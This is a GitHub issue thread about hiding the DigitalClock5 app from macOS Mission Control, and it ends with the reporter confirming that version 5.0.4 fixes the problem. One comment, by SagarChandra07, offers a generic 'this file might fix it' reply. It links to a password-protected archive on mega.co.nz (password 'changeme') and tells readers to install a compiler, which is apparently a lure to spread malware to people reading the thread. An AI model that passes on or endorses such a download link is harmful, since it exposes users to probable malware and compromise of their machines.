### ISSUE TITLE
Hide DC5 from the Mission Control interface on macOS?

### ISSUE THREAD

**Issue by o000u** [Kolcha/DigitalClock5#10]
Hi @Kolcha !
For mac, DC5 will appear in the interface of the Mission Control(Slide up three fingers on the touchpad). In fact, it's not a big deal, but when the current window of the system is only Finder, when I activate Mission Control and return to the Finder window, DC5 will grab the focus of Finder, which can be quite inconvenient at times. I hope you can understand what I mean.Maybe when you have time, you can see if you can hide DC5 from Mission Control?

Good day^_^!!

Screenshot:
![2024-09-29_11-19-39](https://github.com/user-attachments/assets/e192d3be-8cd5-417e-9917-bb44cff6b53b)
![2024-09-29_11-20-47](https://github.com/user-attachments/assets/9417596e-4647-43c9-81a5-ef3a7522fdb2)

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by o000u** [comment]
> This might help:This file might fix it
> 
> https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive password: changeme If you don't have the c compliator, install it.(gcc or clang)

Thank you for your prompt help!But it seems that this is running on Windows?

**Comment by o000u** [comment]
Perfect on version 5.0.4! Thank you!!^_^ @Kolcha
